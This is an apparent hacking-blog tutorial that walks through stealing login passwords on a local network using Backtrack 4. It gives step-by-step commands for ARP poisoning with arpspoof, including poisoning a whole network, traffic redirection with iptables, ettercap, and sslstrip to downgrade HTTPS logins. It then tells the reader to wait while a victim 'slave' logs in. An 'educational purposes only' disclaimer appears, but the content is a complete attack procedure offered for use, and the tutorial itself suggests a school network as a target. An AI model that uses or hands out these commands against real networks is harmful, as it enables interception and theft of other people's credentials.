Loading...

How to get any Website Login Passwords with uses SSL Encryption

in this tutorial you're going to learn how get any Logins with a SSL Encyryption. . But if u have any questions feel free to ask. TH...

in this tutorial you're going to learn how get any Logins with a SSL Encyryption. . But if u have any questions feel free to ask.


THIS TUT IS FOR EDUCATIONAL PURPOSES ONLY ! SO DON'T TRY THIS AT ANY OTHER NETWORKS WHICH ISN'T YOURS !


WHAT U NEED FOR THIS TUTORIAL :

- 1. Backtrack 4 RC2 ( For those who don't know what it is : it is a Linux Distribution.) You can use VMWARE (PC/MAC) or Parallels (MAC). Or u can use BT as a LIVE CD. IMPORTANT : Backtrack is a legal Operating System, and u can download it free. Just Google for it.

- 2. A internal / external WIFI card which is supported by BackTrack ( If u don't have any WIFI Card which is supported by BT, go and buy one Ebay for cheap. Normally every WIFI Card which has a Atheros or Realtek Chip should work.)
But u can check ur WIFI Card here if your card is SUPPORTED or NOT HERE Compatibility List

- 3. A Network like your home network with some Computers connected to the Router or School Network if u don't have a another PC to test ( BUT ONLY FOR EDUCATIONAL PURPOSES ONLY )

- 4. A slave ( another PC connected to your network )

HOW DOES IT WORK :

Well there is a few things your doing. One of the major part is that you are doing is a ARP Poisoning. ( NOW IT GETS REALLY CONFUSING , BUT I TRY TO KEEP IT SIMPLE ) With the ARP Poisoning you are manipulating the arp packages and rerouting every package to your PC. NOW to understand this method : You are saying the Router that you are the slave Pc and to the slave Pc you are saying that you are the Router. We call this method " Man in the Middle Attack".
The second part is to "DECRYPT" the SSL Encryption ( it's not a decryting at all ) with SSLSTRIP. Well what u doing is that you are filtering everything between the slave PC and the Router.

NOW LET'S GET STARTED :
- First let's check if your WIFI Card is supported or not.
Open the Terminal ( it is the black Box in the Taskbar ) and type :

airmon-ng

- Now you should see your WIFI Card. We need start up the WIFI Card. So type :

airmon-ng start [interface-name, in my case it's wlan0] wlan0

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

- Now we have to connect to our own Network. But this is a little bit complicated. Anyway let's face it.

Go to the BT Icon ( It's the icon in left below corner, it's a dragon icon ) and click it. Now u see a Menu. Go to "Internet" => And choose the "Wicd Network Manager"


DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

- It should open the WICD Manager. Now you should see your Wireless Network, if not just click on the "Refresh"-Button. The next Step is to connect to your network. If u have any WIFI Encryption ( which I highly recommend ), then u have to enter it. Just click on the "Properties"-Button next to the "Connect"-Button.
Choose your encryption and enter the password. If u have successfully connected to the network, just minimize the window. (DON'T CLOSE IT !)

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

OKAY, now we have to set up everything for SSLSTRIP. Go to the terminal and type following command :

kate /etc/etter.conf

- We have edit this config file. Scroll down to the "Linux" Section.
Uncomment (= remove the "#" ) before "redir_command_on" and "redir_command_off" . Just click save and close the editor.

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

- Open a new up a Terminal and type the following command :

echo 1 > /proc/sys/net/ipv4/ip_forward

- Now type :

arpspoof -i (your device name, in my case it's wlan0 )wlan0 -t (the specific slave's ip) 192.168.1.6 (and ip od the router )192.168.1.1

arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

-BUT if u like to poison the whole network just type :

arpspoof -i wlan0 (ip of the router) 192.168.1.1

arpspoof -i wlan0 192.168.1.1

- Open another Terminal and type :

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

-Then in the same Terminal window :

ettercap -T -q -i wlan0

-Finally open a new Terminal and type :

sslstrip -a -k -f

-AND FINALLY OPEN THE FINAL AND LAST TERMINAL AND TYPE:
ettercap -T -q -i wlan0

NOW you are ready to go, let the slave login to any site with ssl. Grap a Coffee and wait. Here are some demonstration pics :

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Reactions: 

Post a Comment

emo-but-icon

Home item

Follow by Email

Recommend on Google

Advertisements

Advertisements

Popular Posts

Random Posts

Recent Posts

ADS

eXTReMe Tracker